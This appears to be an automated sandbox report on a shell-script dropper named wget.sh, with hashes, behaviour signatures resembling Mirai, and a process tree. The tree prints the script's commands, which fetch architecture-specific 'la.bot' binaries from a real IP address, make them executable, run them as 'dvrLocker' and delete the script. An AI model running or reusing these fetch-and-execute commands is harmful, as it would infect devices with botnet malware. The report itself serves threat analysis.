Overview

overview

7

Static

static

1

wget.sh

ubuntu-18.04-amd64

7

wget.sh

debian-9-armhf

7

wget.sh

debian-9-mips

7

wget.sh

debian-9-mipsel

7

Analysis

  • max time kernel
    149s
  • max time network
    127s
  • platform
    debian-9_mipsel
  • resource
    debian9-mipsel-20240418-en
  • resource tags

    arch:mipselimage:debian9-mipsel-20240418-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem
  • submitted
    18/10/2024, 09:41

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    wget.sh

  • Size

    420B

  • MD5

    878878ef9a55d128c2917bfb365e4261

  • SHA1

    3f95d013d7602c813cafd4be15c43c37a9c71d2e

  • SHA256

    bd6ee818b79172a3d43e87463157ee94c942a321fd2ed582610962e323d0817a

  • SHA512

    dfb89655ef3662bb93b765211863cdff5101a00edf9f45b741e8c401402ec429196cf97b4c4e54dfbfc7153b3c50c2ae9da5e3fab45d51a96f0f25ca6c365cf6

Score
7/10
credential_accessdefense_evasiondiscovery

Malware Config

Signatures

  • File and Directory Permissions Modification 1 TTPs 8 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

    defense_evasion
  • Executes dropped EXE 8 IoCs
  • Modifies Watchdog functionality 1 TTPs 2 IoCs

    Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.

    defense_evasion
  • Renames itself 2 IoCs
  • Unexpected DNS network traffic destination 1 IoCs

    Network traffic to other servers than the configured DNS servers was detected on the DNS port.

  • Reads process memory 1 TTPs 1 IoCs

    Read the memory of a process through the /proc virtual filesystem. This can be used to steal credentials.

    credential_access
  • Changes its process name 1 IoCs
  • System Network Configuration Discovery 1 TTPs 2 IoCs

    Adversaries may gather information about the network configuration of a system.

    discovery
  • Writes file to tmp directory 1 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/wget.sh
    /tmp/wget.sh
    1⤵
    • Writes file to tmp directory
    PID:709
    • /bin/rm
      rm -rf dvrLocker
      2⤵
        PID:710
      • /usr/bin/wget
        wget http://103.149.87.69/a/b/la.bot.arm -O -
        2⤵
          PID:711
        • /bin/chmod
          chmod 777 dvrLocker
          2⤵
          • File and Directory Permissions Modification
          PID:738
        • /mnt/dvrLocker
          ./dvrLocker
          2⤵
          • Executes dropped EXE
          PID:739
        • /usr/bin/wget
          wget http://103.149.87.69/a/b/la.bot.arm5 -O -
          2⤵
            PID:741
          • /bin/chmod
            chmod 777 dvrLocker
            2⤵
            • File and Directory Permissions Modification
            PID:742
          • /mnt/dvrLocker
            ./dvrLocker
            2⤵
            • Executes dropped EXE
            PID:743
          • /usr/bin/wget
            wget http://103.149.87.69/a/b/la.bot.arm6 -O -
            2⤵
              PID:745
            • /bin/chmod
              chmod 777 dvrLocker
              2⤵
              • File and Directory Permissions Modification
              PID:746
            • /mnt/dvrLocker
              ./dvrLocker
              2⤵
              • Executes dropped EXE
              PID:747
            • /usr/bin/wget
              wget http://103.149.87.69/a/b/la.bot.arm7 -O -
              2⤵
                PID:751
              • /bin/chmod
                chmod 777 dvrLocker
                2⤵
                • File and Directory Permissions Modification
                PID:764
              • /mnt/dvrLocker
                ./dvrLocker
                2⤵
                • Executes dropped EXE
                PID:766
              • /usr/bin/wget
                wget http://103.149.87.69/a/b/la.bot.m68k -O -
                2⤵
                  PID:769
                • /bin/chmod
                  chmod 777 dvrLocker
                  2⤵
                  • File and Directory Permissions Modification
                  PID:785
                • /mnt/dvrLocker
                  ./dvrLocker
                  2⤵
                  • Executes dropped EXE
                  PID:786
                • /usr/bin/wget
                  wget http://103.149.87.69/a/b/la.bot.mips -O -
                  2⤵
                  • System Network Configuration Discovery
                  PID:789
                • /bin/chmod
                  chmod 777 dvrLocker
                  2⤵
                  • File and Directory Permissions Modification
                  PID:803
                • /mnt/dvrLocker
                  ./dvrLocker
                  2⤵
                  • Executes dropped EXE
                  PID:804
                • /usr/bin/wget
                  wget http://103.149.87.69/a/b/la.bot.mipsel -O -
                  2⤵
                  • System Network Configuration Discovery
                  PID:806
                • /bin/chmod
                  chmod 777 dvrLocker
                  2⤵
                  • File and Directory Permissions Modification
                  PID:807
                • /mnt/dvrLocker
                  ./dvrLocker
                  2⤵
                  • Executes dropped EXE
                  • Modifies Watchdog functionality
                  • Renames itself
                  • Reads process memory
                  • Changes its process name
                  PID:808
                • /usr/bin/wget
                  wget http://103.149.87.69/a/b/la.bot.sh4 -O -
                  2⤵
                    PID:814
                  • /bin/chmod
                    chmod 777 dvrLocker
                    2⤵
                    • File and Directory Permissions Modification
                    PID:815
                  • /usr/bin/wget
                    wget http://103.149.87.69/a/b/la.bot.powerpc -O -
                    2⤵
                      PID:817
                    • /mnt/dvrLocker
                      ./dvrLocker
                      2⤵
                      • Executes dropped EXE
                      PID:819
                    • /bin/rm
                      rm -rf /tmp/wget.sh
                      2⤵
                        PID:822

                    Network

                    MITRE ATT&CK Enterprise v15

                    Replay Monitor

                    Loading Replay Monitor...

                    Downloads

                    • /mnt/dvrLocker
                      Filesize

                      54KB

                      MD5

                      db1a114307c57d7d97acf3dbe1959bf5

                      SHA1

                      a8a3d0b323ec3229ec2c06a8dfff9486cd987739

                      SHA256

                      044462feecab936afe4620ee15c24854f1f48d3b18fd5b5d07f1fda274371ead

                      SHA512

                      5924211f76c6d8a2f88fab8c8f14ec221efd8488de3ca493ec8fd0e5cfb287b2c2563184b406033f37dab9d4121203d22669415ecdf668c2e2e1f5a5c4eb517c

                      Download Submit

                    • /mnt/dvrLocker
                      Filesize

                      79KB

                      MD5

                      23eada666ff642f1dbdfb91b93d5c745

                      SHA1

                      70778758af06a219d15a394be128562fee05bbf1

                      SHA256

                      b0fce4372fdb0be4b7540e592106056cb38caa24056fa3571f0c9b3f40ac006b

                      SHA512

                      2ec5a1256b5c0891c283114e0b43270cfad3f8fe77871b9163ea2e113025f90e6e1794cc1d16c121abbe173e05f84702e7daa37562befb7d81b20317d293f2df

                      Download Submit

                    • /mnt/dvrLocker
                      Filesize

                      54KB

                      MD5

                      be76a190f3b90d5cb00a5cbc15b112a4

                      SHA1

                      da8903c31f36952390ff4975683504b9ceff05ea

                      SHA256

                      9258876ed0aaf0ff28b2b68c5e1ebac8680d7dc8b5de2f67e198035b1f1d545e

                      SHA512

                      0ef32ef56b4cd888974fc1e900be3956ef23e447b4efb3c1231b11dd77596455b9a5f2927c11f2380308deeb5e97b1a8afd76c350d2d70daea9c1b862934b771

                      Download Submit

                    • /mnt/dvrLocker
                      Filesize

                      54KB

                      MD5

                      e416439abb52454448f56c016daa4dea

                      SHA1

                      f5dc393e1f8b3859b3e38f38febe78aa5f20e733

                      SHA256

                      d47579b7e218ac96d3d25c3f3ad2c6a00d2af91b07687a394adfd86cf1d972df

                      SHA512

                      c92336de627399aca5e3b771b68a51e04338eb79af637776b2e5844868266dd408362c9c0aca5687b9dc6b880fe740fe3dcebcc200bff1ea7e2076ed10cf8b3d

                      Download Submit

                    • /mnt/dvrLocker
                      Filesize

                      65KB

                      MD5

                      23c99866e6a90c1aa327cca2078bf089

                      SHA1

                      a78539835a6c34b0da02c08379c220b708888017

                      SHA256

                      8da57edc934cf3432607e37dfdfd7c6b461234beaf722ec0b3d49a2aea03191d

                      SHA512

                      2a6401ed67c460414bcc5a2d721718f615be2e78ac882dfce57460377a19f31ce96162d9e5a40386ddbef4cb71fa9063763d921bc944fc9f756723cb689bb39c

                      Download Submit

                    • /mnt/dvrLocker
                      Filesize

                      77KB

                      MD5

                      d2c3556a910e0370ecd3997cfd8b8f69

                      SHA1

                      b220577b9ac4ff9a662bd4a66ba3c4fff878c253

                      SHA256

                      23147675e90639c0bc4d038c3c72cf9191712d730c4eec0c58a7173250fd3ea0

                      SHA512

                      e6715854ef515cf1537307bc588790f75df7487fe0e28329a425bb616b409f8a0282555bc2367eed6faad074e34043ff4f95b97c441e5ecfa011c177e713cc8c

                      Download Submit